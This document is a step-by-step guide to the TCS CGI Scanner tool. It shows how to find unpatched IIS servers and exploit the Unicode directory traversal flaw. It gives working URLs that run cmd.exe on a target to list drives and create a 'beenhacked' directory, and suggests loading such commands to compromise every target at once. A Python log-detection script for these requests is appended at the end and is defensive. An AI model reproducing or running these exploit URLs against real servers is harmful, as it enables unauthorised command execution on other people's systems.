The TCS Common Gateway Interface (CGI) Scanner application is designed to find targets that have vulnerable CGI scripts. These vulnerabilities are normally due to systems that have not been patched or updated.
Click to highlight the default target of http://www.tpp.ru and click on the button at the top left of the application to delete the current target.
On the gray bar along the top left of the application, enter the IP address or hostname of the target and click on the gray-colored arrow to insert the new target. Repeat this process for multiple targets. The TCS CGI Scanner is now ready to scan the target.
In this example, each script run against the target is displayed with the result to the right. The ones of interest are any with a 200 (the HTTP status code for a successful request), as this indicates a successful attempt.
To execute, right-click on a script and left-click on Copy String. Open Internet Explorer and paste the line in the address bar. Press the Enter key. The directory listing of the target’s C: drive will appear.
The line that should be in the address bar is:
http://172.16.1.40/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
To list the contents of the Program Files directory, edit the address bar to:
http://172.16.1.40/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\progra~1
To create a directory on the target, change the command within the script:
http://172.16.1.40/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+md+c:\beenhacked
Notice that the beenhacked directory is now created in the root of the C: drive on the target.
The gray bar along the top right of the application allows you to enter custom scripts for the application to check against the target. If you wanted to check the Program Files directory or create a beenhacked directory on each target it is capable of compromising, you could enter these scripts here and click the downward-pointing arrow to enter the script into the application. Repeat this process for multiple targets.
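On the defending side, the requests shown above are easy to spot in web server logs, because %c0%af is an overlong UTF-8 encoding of "/" that valid UTF-8 never produces. The following is an added example, not part of the original post or of the TCS tool: it decodes overlong sequences (generalized beyond %c0%af to any 2-byte or 3-byte overlong form), then flags traversal to cmd.exe and whether the server answered 200. The log field order, the client address 192.0.2.10 and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import unquote_to_bytes

# Overlong UTF-8: C0/C1 + continuation byte (2-byte form) or
# E0 + 80..9F + continuation byte (3-byte form). Valid UTF-8 never uses these.
OVERLONG = re.compile(rb"[\xc0\xc1][\x80-\xbf]|\xe0[\x80-\x9f][\x80-\xbf]")

def fold(match):
    """Return the shortest-form encoding of the character an overlong sequence hides."""
    seq = match.group(0)
    cp = seq[0] & (0x1F if len(seq) == 2 else 0x0F)
    for b in seq[1:]:
        cp = (cp << 6) | (b & 0x3F)
    return chr(cp).encode("utf-8")

def inspect(stem, status):
    """Classify one request path (cs-uri-stem) and its response status."""
    canon, n = OVERLONG.subn(fold, unquote_to_bytes(stem))
    path = canon.replace(b"\\", b"/").lower()
    findings = []
    if n:
        findings.append("overlong-utf8")
    if b"../" in path:
        findings.append("traversal")
    if path.endswith(b"/cmd.exe"):
        findings.append("cmd.exe")
    if findings and status == 200:
        findings.append("succeeded")  # the page treats 200 as a successful attempt
    return findings

# Constructed sample; assumed fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = r"""
2001-05-01 10:00:01 192.0.2.10 GET /default.htm - 200
2001-05-01 10:00:02 192.0.2.10 GET /docs/caf%c3%a9.htm - 200
2001-05-01 10:00:03 192.0.2.10 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir+c:\ 200
2001-05-01 10:00:04 192.0.2.10 GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+dir+c:\ 404
"""

def scan(log):
    """Return (client, path, findings) for every suspicious line."""
    hits = []
    for line in log.strip().splitlines():
        f = line.split()
        findings = inspect(f[4], int(f[6]))
        if findings:
            hits.append((f[2], f[4], findings))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Legitimate non-ASCII paths such as the caf%c3%a9 line are not flagged, because %c3%a9 is a shortest-form encoding.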